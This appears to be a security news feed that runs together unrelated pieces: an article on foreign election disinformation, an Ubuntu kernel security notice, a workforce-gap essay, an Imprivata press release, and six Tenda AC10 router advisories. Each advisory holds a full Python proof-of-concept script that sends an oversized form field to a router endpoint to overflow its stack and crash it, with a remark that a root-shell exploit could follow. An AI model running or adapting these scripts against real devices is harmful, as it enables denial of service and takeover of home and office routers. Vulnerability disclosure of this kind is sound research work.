Foreign nations continue to target various US public entities and private industries with cyberattacks, but the coming midterms are driving more disinformation than hacking, say experts.

While traditional cyberattack operations against US government organizations have remained fairly consistent, influence and disinformation attacks by foreign nations have increased in the run-up to the US midterm elections.  

On the cyberattack front, the China-linked hacking group Budworm has targeted several government agencies, including the legislature for a US state, over the past six months, according to Symantec, part of Broadcom Software. The attack on a US government organization is the second recent incident — after a hiatus of more than six years — where the group has targeted a US private-sector agency, the company's researchers stated in an advisory.

The attack is a departure from the group's more recent strategy of targeting Southeast Asia, and could mark a shift in strategy, says Dick O'Brien, principal intelligence analyst for the Symantec Threat Hunter team.  

The group "has been mounting espionage attacks in other regions, mostly Asia and the Middle East, \[and\] earlier this year German intelligence warned of attacks on organizations in that country," he says. "We consider Budworm to be one of the more capable APT outfits, and the return to the US could signal a change in strategic priorities."

However, security experts expect mostly a variety of influence attacks to ramp up against US government agencies and the campaigns of political candidates as the country's midterm elections approach. 

Cyber-intelligence firm Recorded Future pointed to the US intelligence community's assessment of foreign threats to the 2020 election and concluded that the country should expect more of the same in 2022.

"\[I\]n 2022, such behavior \[attempting to influence politics\] has likely only intensified against the backdrop of conventional and hybrid warfare in Ukraine, broad international ramifications of said conflict, lingering effects of a global pandemic, and a broadening distrust in traditional democratic institutions," Recorded Future stated in its report, adding: "The key motivations for influencing US elections are typically centered around adversaries' long-term geopolitical interests and furthering their own domestic goals."

Russia is focused on "sowing discord with regard to US political and societal affairs," with a focus on hindering concerted opposition to its invasion of Ukraine, while China conducts both public and private campaigns against its detractors, and Iranian actors aim to create support for a nuclear deal. Domestic extremists have become a significant disinformation threat over the past half decade, the company concluded.

**Not Just Russia**

Foreign countries continue to level a variety of attacks against public and private US organizations. In addition to Budworm, aka Aquatic Panda, cybersecurity services firm CrowdStrike has encountered North Korean hacking groups such as Stardust Chollima attacking financial organizations and stealing cryptocurrency and Iranian groups such as Charming Kitten targeting US government officials.

Recently, FBI officials warned both Republican and Democratic campaigns that they are being targeted by hackers thought to be linked to the Chinese state-sponsored APT1 group, according to The Washington Post. The hackers targeted the domains belonging to more than 100 political parties in US states with Internet scans and other attack activity, the National Security Agency (NSA) reported warned.

Such disruptive attacks and financial hacking are a constant presence, says Adam Meyers, senior vice president of threat intelligence for CrowdStrike.

"There is constantly espionage operations targeting the US — you know, constant, we are tracking it every single day," he says.

With the US midterm elections less than a month away, much of the disinformation has focused on attempting to change attitudes of undecided voters and energizing supporters to get out and vote.

In addition, some threat actors have targeted election officials with online attacks. County-level election workers are being targeted with phishing attacks, with Arizona, for example, seeing a doubling of attacks between the second and third quarters, according to endpoint detection and response (EDR) firm Trellix. Another battleground state, Pennsylvania, also saw an dramatic increase of nearly 70% in malicious e-mail messages, the company said in an Oct. 12 blog post.

The surge in e-mail messages is a reminder that election security issues affect smaller government agencies, which do not have the deep pockets of larger companies, Trellix researchers stated in the post.

"\[S\]tates and localities do not operate on an equal cybersecurity footing" as the federal government, they said. "Some will be more susceptible to attacks than others and many will continue to require the help of the federal government to not only harden themselves to these and other attacks, but also educate local election employees in cyber hygiene to thwart them at their point of attack."

**CISA, FBI: No "Successful Attack" on Election Systems**

To reassure US citizens that their votes will count, the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigations (FBI) published an announcement on Oct. 4, emphasizing that the agencies have not yet seen any significant, nor successful, attack on election systems.  

"As of the date of this report, the FBI and CISA have no reporting to suggest cyber activity has ever prevented a registered voter from casting a ballot, compromised the integrity of any ballots cast, or affected the accuracy of voter registration information," the agencies stated. "Any attempts tracked by FBI and CISA have remained localized and were blocked or successfully mitigated with minimal or no disruption to election processes."

Former president Donald Trump and his supporters have pushed dispelled theories of election fraud both prior to and following the 2020 presidential election. In the Republican primaries, many Trump supporters also made claims, without evidence, of election fraud, prior to the final tally, even when they won the primary.

CISA and the FBI did not address any specific claims, but warned voters to be critical of such news.

"Be wary of emails or phone calls from unfamiliar email addresses or phone numbers that make suspicious claims about the elections process or of social media posts that appear to spread inconsistent information about election-related incidents or results," the agencies stated.

Disinformation Attacks Threaten US Midterm Elections

Ubuntu Security Notice 5683-1 - It was discovered that the framebuffer driver on the Linux kernel did not verify size limits when changing font or screen size, leading to an out-of- bounds write. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Selim Enes Karaduman discovered that a race condition existed in the General notification queue implementation of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5683-1  
October 14, 2022

linux-ibm vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-ibm: Linux kernel for IBM cloud systems

Details:

It was discovered that the framebuffer driver on the Linux kernel did not  
verify size limits when changing font or screen size, leading to an out-of-  
bounds write. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2021-33655)

Selim Enes Karaduman discovered that a race condition existed in the  
General notification queue implementation of the Linux kernel, leading to a  
use-after-free vulnerability. A local attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-1882)

Duoming Zhou discovered that race conditions existed in the timer handling  
implementation of the Linux kernel's Rose X.25 protocol layer, resulting in  
use-after-free vulnerabilities. A local attacker could use this to cause a  
denial of service (system crash). (CVE-2022-2318)

Roger Pau Monné discovered that the Xen virtual block driver in the Linux  
kernel did not properly initialize memory pages to be used for shared  
communication with the backend. A local attacker could use this to expose  
sensitive information (guest kernel memory). (CVE-2022-26365)

Pawan Kumar Gupta, Alyssa Milburn, Amit Peled, Shani Rehana, Nir Shildan  
and Ariel Sabba discovered that some Intel processors with Enhanced  
Indirect Branch Restricted Speculation (eIBRS) did not properly handle RET  
instructions after a VM exits. A local attacker could potentially use this  
to expose sensitive information. (CVE-2022-26373)

Eric Biggers discovered that a use-after-free vulnerability existed in the  
io_uring subsystem in the Linux kernel. A local attacker could possibly use  
this to cause a denial of service (system crash) or possibly execute  
arbitrary code. (CVE-2022-3176)

Roger Pau Monné discovered that the Xen paravirtualization frontend in the  
Linux kernel did not properly initialize memory pages to be used for shared  
communication with the backend. A local attacker could use this to expose  
sensitive information (guest kernel memory). (CVE-2022-33740)

It was discovered that the Xen paravirtualization frontend in the Linux  
kernel incorrectly shared unrelated data when communicating with certain  
backends. A local attacker could use this to cause a denial of service  
(guest crash) or expose sensitive information (guest kernel memory).  
(CVE-2022-33741, CVE-2022-33742)

Jan Beulich discovered that the Xen network device frontend driver in the  
Linux kernel incorrectly handled socket buffers (skb) references when  
communicating with certain backends. A local attacker could use this to  
cause a denial of service (guest crash). (CVE-2022-33743)

Oleksandr Tyshchenko discovered that the Xen paravirtualization platform in  
the Linux kernel on ARM platforms contained a race condition in certain  
situations. An attacker in a guest VM could use this to cause a denial of  
service in the host OS. (CVE-2022-33744)

It was discovered that the virtio RPMSG bus driver in the Linux kernel  
contained a double-free vulnerability in certain error conditions. A local  
attacker could possibly use this to cause a denial of service (system  
crash). (CVE-2022-34494, CVE-2022-34495)

It was discovered that the Netlink Transformation (XFRM) subsystem in the  
Linux kernel contained a reference counting error. A local attacker could  
use this to cause a denial of service (system crash). (CVE-2022-36879)

Domingo Dirutigliano and Nicola Guerrera discovered that the netfilter  
subsystem in the Linux kernel did not properly handle rules that truncated  
packets below the packet header size. When such rules are in place, a  
remote attacker could possibly use this to cause a denial of service  
(system crash). (CVE-2022-36946)

Jann Horn discovered that the KVM subsystem in the Linux kernel did not  
properly handle TLB flush operations in some situations. A local attacker  
in a guest VM could use this to cause a denial of service (guest crash) or  
possibly execute arbitrary code in the guest kernel. (CVE-2022-39189)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1015-ibm     5.15.0-1015.17  
   linux-image-ibm                 5.15.0.1015.14

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5683-1  
   CVE-2021-33655, CVE-2022-1882, CVE-2022-2318, CVE-2022-26365,  
   CVE-2022-26373, CVE-2022-3176, CVE-2022-33740, CVE-2022-33741,  
   CVE-2022-33742, CVE-2022-33743, CVE-2022-33744, CVE-2022-34494,  
   CVE-2022-34495, CVE-2022-36879, CVE-2022-36946, CVE-2022-39189

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1015.17

Ubuntu Security Notice USN-5683-1

Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/formSetSpeedWan.

Permalink

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/SetSpeedWan，speed\_dir is controllable and will eventually be spliced into ret\_buf by sprintf. It is worth noting that the size is not checked, resulting in a stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x300
p2 \= b'speed\_dir=' + p1

p3 \= b"POST /goform/SetSpeedWan" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-42166: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/formSetFirewallCfg.

Permalink

Cannot retrieve contributors at this time

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/SetFirewallCfg, firewall\_value is controllable and will be copied to firewall\_buf by strcpy. It is worth noting that there is no size check, resulting in stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'firewallEn=' + p1

p3 \= b"POST /goform/SetFirewallCfg" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-42167: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/fromSetIpMacBind.

Permalink

Cannot retrieve contributors at this time

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/SetIpMacBind, The static\_list is controllable, it will assign the value to the list, and finally use strcpy to copy the list to mib\_buf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x1000
p2 \= b'list=' + p1

p3 \= b"POST /goform/SetIpMacBind" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-42168: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/addWifiMacFilter.

Permalink

Cannot retrieve contributors at this time

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/addWifiMacFilter, device\_mac, device\_id are controllable and will be copied to mib\_value by sprintf. It is worth noting that the size is not checked, resulting in a stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'device\_id=1&device\_mac=' + p1

p3 \= b"POST /goform/addWifiMacFilter" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-42169: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/formWifiWpsStart.

Permalink

Cannot retrieve contributors at this time

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/WifiWpsStart，The index and mode are controllable. If the conditions are met to sprintf, they will be spliced into tmp. It is worth noting that there is no size check,which leads to a stack overflow vulnerability.

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'mode=1&index=' + p1

p3 \= b"POST /goform/WifiWpsStart" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-42170: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/saveParentControlInfo.

Permalink

Cannot retrieve contributors at this time

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/saveParentControlInfo, In saveParentControlInfo, deviceName and deviceId are controllable and will be passed into the set\_device\_name function. In the set\_device\_name function, dev\_name will be spliced into mib\_vlaue by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'deviceId=1&deviceName=' + p1

p3 \= b"POST /goform/saveParentControlInfo" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-42171: IOT_Vul/readme.md at main · z1r00/IOT_Vul

A cross-disciplinary effort of change is needed to attract new professionals in the coming decade.

In 2010, the Center for Strategic and International Studies (CSIS) published the report "A Human Capital Crisis in Cybersecurity," which noted "there are about 1,000 security people in the US who have the specialized security skills to operate effectively in cyberspace. We need 10,000 to 30,000."

Twelve years later, the Cyberspace Solarium Commission 2.0 Workforce Development Agenda for the National Cyber Director observed that "in the United States, there are almost 600,000 open cybersecurity jobs across the private sector and federal, state, and local governments — a remarkable gap considering that the field currently employs just over a million professionals." This is not an encouraging trend.

**Stakeholders Who Have the Power**

To effect multigenerational change, there are four distinct groups of stakeholders that have the power to best address a problem that has existed for over a decade.

**Cybersecurity buyers** should generally stop buying point solutions and instead focus on a strategy of long-term consolidation of technical cybersecurity capabilities. Although the latest shift-left-zero-trust-artificial-intelligence-XDR-machine-learning "solution" may provide comprehensive coverage against the latest techniques from an advanced persistent threat, it's meaningless unless your organization has actual proof of engagement by an advanced persistent threat (APT) that uses those techniques. Each new point solution has a training and operations burden, typically a minimum of two people who must learn to design and operate the solution.

Unfortunately, each new solution also needs to be integrated into the organization's existing security stack, which takes precious time and resources, and where visibility failures may provide coverage for threat actors to hide. By comparison, an integrated security stack might not immediately cover every conceivable technology threat permutation, but it will take fewer human resources to own and operate, and those staff tasked with operations will have in-depth knowledge as a result.

**HR professionals** should de-emphasize the importance of certifications for interns and junior and midcareer professionals and instead focus on on-the-job training and clearly defined career paths for cybersecurity professionals. The issue with certifications has existed since before CSIS in 2010 observed, "It is the consensus of the Commission that the current professional certification regime is not merely inadequate; it creates a dangerously false sense of security." Part of the reason for the workforce gap is the sheer number of entry-level job postings that require certifications; the specificity of the job descriptions also has been repeatedly shown to discourage otherwise-qualified women and minorities from even applying.

Retaining cybersecurity professionals is similarly difficult, as many junior and midcareer professionals will change jobs every two to five years to gain expertise with new technologies and additional security domains. Both hiring and retention can be managed effectively with well-defined career paths for cybersecurity professionals, such as those defined by the National Institute of Standards and Technology's (NIST) National Initiative for Cybersecurity Education (NICE) program. When supplemented by paid training from employers, employees are more likely to stay, which further reduces the cybersecurity skills gap.

**Compliance professionals** should be aware that their security counterparts are continuously overextended and seek to automate as many compliance operations as feasible. When responding to an internal assessment or an external audit, compliance professionals regularly rely on the security team to collect evidence of internal control operation and effectiveness. Realistically, this is an "extra" job duty on the part of security professionals, and as such, these tasks may be done in a rush or put off to the last minute, due to the more pressing duties on their limited time. These activities include manual tasks such as taking a screenshot of the password policy and saving it in a defined location or creating a PDF report showing that all hard drives are encrypted. As these compliance activities do not require creativity or intuition, they are prime opportunities for automation, which will lessen the time burden on security professionals. This may also result in a positive change in budgetary priorities, as an organization that has automated many compliance operations can hire additional security staff rather than additional compliance staff.

**Individual cybersecurity professionals** should reach out to middle schools and high schools to find opportunities to speak to young people about their jobs. A persistent misconception in secondary education is that cybersecurity jobs require a programming background, yet most cybersecurity jobs require no expertise in programming. Individual contributors across all disciplines — including sales, marketing, UX design, customer success, DFIR, and red teamers — should try to speak to one secondary school audience about what they do, why they love their job, and how their job has a middle-class salary that likely only required a two-year degree. That last part will resonate with many secondary school students and their parents who are considering how long it may take to pay off a four-year university degree.

Despite there not being a single solution to solving the cybersecurity workforce gap, there are reasons to be hopeful. The cybersecurity community attracts people who like working in teams and sharing their knowledge and experiences. A cross-disciplinary effort of behavioral changes across stakeholders based on shared values may be our best solution moving forward for the next decade.

4 Stakeholders Critical to Addressing the Cybersecurity Workforce Gap

Offers solution to accelerate identity intelligence through simplified, yet extensive, visibility of user activity.

**WALTHAM, Mass., Oct. 17, 2022 (GLOBE NEWSWIRE)** — Imprivata, the digital identity company for mission- and life-critical industries, today announced the expansion of its integrated digital identity platform to defragment identities across a broad set of clinical and enterprise applications, with full visibility into individual user access activity. This integration leverages Imprivata OneSign, the company’s single sign-on solution, as the identity source for Imprivata FairWarning, its risk analytics and intelligence offering, to uniquely provide the necessary view of users across the entire application ecosystem to ensure compliance and reduce security risks.  

Healthcare organizations must understand quickly and easily who is accessing protected health information (PHI) to accurately detect, investigate, and prevent major issues before they happen. However, an alarming 51% of organizations don’t monitor access to critical systems and data. For most, it is difficult to understand anomalous behavior across the network as user IDs are not consistent across applications. As a result, it can be extremely challenging to remain compliant with HIPAA and other regulations while preventing hacks and data breaches.

“Today’s security, compliance, and privacy professionals are facing unprecedented complexities that create barriers to delivering efficient and seamless access to technology resources needed for optimum patient care delivery,” said Mark McArdle, Chief Products and Design Officer at Imprivata. “Solving complex digital identity challenges is our key priority, so we’re proud to extend our platform of capabilities to make their jobs easier and their organizations more secure.”

Available immediately, this integration enables healthcare organizations to:

*   **View enforced policy violations across the ecosystem** to identify high-risk users at-a- glance
*   **Increase match rates and accelerate user risk scoring via artificial intelligence (AI)** to understand and assess risk based on cross-application activity
*   **Simplify management of user lists in one place** to replace manual management of user lists in each EHR or data source
*   **Automate processes** for updating user information as they move into new roles or departments

Imprivata FairWarning and Imprivata OneSign contribute broadly to the Imprivata Digital Identity Framework (DIF), a guide to enabling, controlling, and monitoring identities across highly complex ecosystems.

For more information, visit www.imprivata.com.

**About Imprivata**   
Imprivata is the digital identity company for mission- and life-critical industries, redefining how organizations solve complex workflow, security, and compliance challenges with solutions that protect critical data and applications without workflow disruption. Its platform of interoperable identity, authentication, and access management solutions enable organizations in over 45 countries to fully manage and secure all enterprise and third-party digital identities by establishing trust between people, technology, and information.

Tag

#intel